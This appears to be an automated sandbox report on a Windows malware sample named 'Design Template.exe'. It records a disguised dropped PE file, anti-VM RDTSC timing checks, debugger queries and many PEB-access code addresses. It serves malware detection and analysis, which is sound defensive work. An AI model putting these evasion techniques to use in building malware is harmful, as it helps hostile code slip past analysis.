Source: Binary string: rundll32.pdbGCTL | source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00426369 LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, 2_2_00426369
Source: Design Template.exe | Static PE information: section name: .cdata
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00422C20 push eax; ret 2_2_00422C4E
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00422DE8 push eax; ret 2_2_00422E06
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A5D0D1 push ecx; ret 4_2_00A5D0E4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044DD0D1 push ecx; ret 14_2_044DD0E4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_004F4984 push ebx; ret 14_2_004F4985
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050B3F2 push eax; ret 14_2_0050B3F8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050B3FB push eax; ret 14_2_0050B462
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050B3A5 push eax; ret 14_2_0050B3F8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050B45C push eax; ret 14_2_0050B462
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050BCBE push ss; ret 14_2_0050BCC5
Source: initial sample | Static PE information: section name: .text entropy: 7.31104749099
Source: C:\Users\user\Desktop\Design Template.exe | File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_004218A0 IsIconic, 2_2_004218A0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00421A45 IsIconic, GetWindowPlacement, GetWindowRect, 2_2_00421A45
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00427F30 GetPropA, CallWindowProcA, CallWindowProcA, IsIconic, CallWindowProcA, GetWindowLongA, SendMessageA, CallWindowProcA, CallWindowProcA, GetWindowLongA, GetClassNameA, lstrcmpA, CallWindowProcA, GetWindowLongA, CallWindowProcA, CallWindowProcA, CallWindowProcA, 2_2_00427F30
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00427780 CallWindowProcA, DefWindowProcA, IsIconic, SendMessageA, GetWindowLongA, GetWindowLongA, GetWindowDC, GetWindowRect, InflateRect, InflateRect, SelectObject, OffsetRect, SelectObject, ReleaseDC, 2_2_00427780
Source: C:\Users\user\Desktop\Design Template.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Design Template.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Design Template.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000004F85E4 second address: 00000000004F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 00000000004F896E second address: 00000000004F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A36A60 rdtscp 4_2_00A36A60
Source: C:\Users\user\Desktop\Design Template.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Liebert.bmp
Source: C:\Windows\explorer.exe TID: 5548 | Thread sleep time: -45000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000007.00000002.516979804.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.299098647.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Design Template.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Design Template.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A36A60 rdtscp 4_2_00A36A60
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_004383A8 LdrLoadDll, 2_2_004383A8
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00426369 LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, 2_2_00426369
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0043AA88 mov eax, dword ptr fs:[00000030h] 2_2_0043AA88
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0043A6E8 mov eax, dword ptr fs:[00000030h] 2_2_0043A6E8
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0043A6F8 mov eax, dword ptr fs:[00000030h] 2_2_0043A6F8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00435F68 mov ecx, dword ptr fs:[00000030h]2_2_00435F68
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A718 mov eax, dword ptr fs:[00000030h]2_2_0043A718
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A7B8 mov eax, dword ptr fs:[00000030h]2_2_0043A7B8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h]4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A490AF mov eax, dword ptr fs:[00000030h]4_2_00A490AF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]4_2_00A3F0BF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h]4_2_00A3F0BF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h]4_2_00A3F0BF
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09080 mov eax, dword ptr fs:[00000030h]4_2_00A09080
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h]4_2_00A83884
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h]4_2_00A83884
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A058EC mov eax, dword ptr fs:[00000030h]4_2_00A058EC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]4_2_00A9B8D0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h]4_2_00A1B02A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h]4_2_00A3002D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h]4_2_00AD4015
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h]4_2_00AD4015
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]4_2_00A87016
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]4_2_00A87016
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h]4_2_00A87016
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD1074 mov eax, dword ptr fs:[00000030h]4_2_00AD1074
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC2073 mov eax, dword ptr fs:[00000030h]4_2_00AC2073
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h]4_2_00A20050
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h]4_2_00A20050
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h]4_2_00A361A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h]4_2_00A361A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A869A6 mov eax, dword ptr fs:[00000030h]4_2_00A869A6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h]4_2_00A851BE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C182 mov eax, dword ptr fs:[00000030h]4_2_00A2C182
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A185 mov eax, dword ptr fs:[00000030h]4_2_00A3A185
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32990 mov eax, dword ptr fs:[00000030h]4_2_00A32990
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A941E8 mov eax, dword ptr fs:[00000030h]4_2_00A941E8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]4_2_00A0B1E1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]4_2_00A0B1E1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]4_2_00A0B1E1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120 mov ecx, dword ptr fs:[00000030h]4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h]4_2_00A3513A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h]4_2_00A3513A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]4_2_00A09100
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]4_2_00A09100
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h]4_2_00A09100
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C962 mov eax, dword ptr fs:[00000030h]4_2_00A0C962
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h]4_2_00A0B171
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h]4_2_00A0B171
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h]4_2_00A2B944
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h]4_2_00A2B944
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h]4_2_00A052A5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]4_2_00A1AAB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]4_2_00A1AAB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]4_2_00A3FAB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h]4_2_00A3D294
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h]4_2_00A3D294
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32AE4 mov eax, dword ptr fs:[00000030h]4_2_00A32AE4
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32ACB mov eax, dword ptr fs:[00000030h]4_2_00A32ACB
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h]4_2_00A44A2C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h]4_2_00A44A2C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A18A0A mov eax, dword ptr fs:[00000030h]4_2_00A18A0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov ecx, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h]4_2_00A05210
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h]4_2_00A0AA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h]4_2_00A0AA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h]4_2_00ACAA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h]4_2_00ACAA16
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A23A1C mov eax, dword ptr fs:[00000030h]4_2_00A23A1C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h]4_2_00ABB260
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h]4_2_00ABB260
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8A62 mov eax, dword ptr fs:[00000030h]4_2_00AD8A62
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4927A mov eax, dword ptr fs:[00000030h]4_2_00A4927A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h]4_2_00A09240
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACEA55 mov eax, dword ptr fs:[00000030h]4_2_00ACEA55
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A94257 mov eax, dword ptr fs:[00000030h]4_2_00A94257
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]4_2_00AD5BA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]4_2_00A34BAD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]4_2_00A34BAD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h]4_2_00A34BAD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC138A mov eax, dword ptr fs:[00000030h]4_2_00AC138A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABD380 mov ecx, dword ptr fs:[00000030h]4_2_00ABD380
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h]4_2_00A11B8F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h]4_2_00A11B8F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3B390 mov eax, dword ptr fs:[00000030h]4_2_00A3B390
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32397 mov eax, dword ptr fs:[00000030h]4_2_00A32397
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h]4_2_00A303E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]4_2_00A2DBE9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h]4_2_00A853CA
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h]4_2_00A853CA
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC131B mov eax, dword ptr fs:[00000030h]4_2_00AC131B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]4_2_00A0DB60
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h]4_2_00A33B7A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h]4_2_00A33B7A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0DB40 mov eax, dword ptr fs:[00000030h]4_2_00A0DB40
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8B58 mov eax, dword ptr fs:[00000030h]4_2_00AD8B58
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0F358 mov eax, dword ptr fs:[00000030h]4_2_00A0F358
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1849B mov eax, dword ptr fs:[00000030h]4_2_00A1849B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC14FB mov eax, dword ptr fs:[00000030h]4_2_00AC14FB
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]4_2_00A86CF0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]4_2_00A86CF0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h]4_2_00A86CF0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]4_2_00AD8CD6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3BC2C mov eax, dword ptr fs:[00000030h]4_2_00A3BC2C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]4_2_00AD740D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]4_2_00AD740D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h]4_2_00AD740D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h]4_2_00A86C0A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h]4_2_00AC1C06
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2746D mov eax, dword ptr fs:[00000030h]4_2_00A2746D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A44B mov eax, dword ptr fs:[00000030h]4_2_00A3A44B
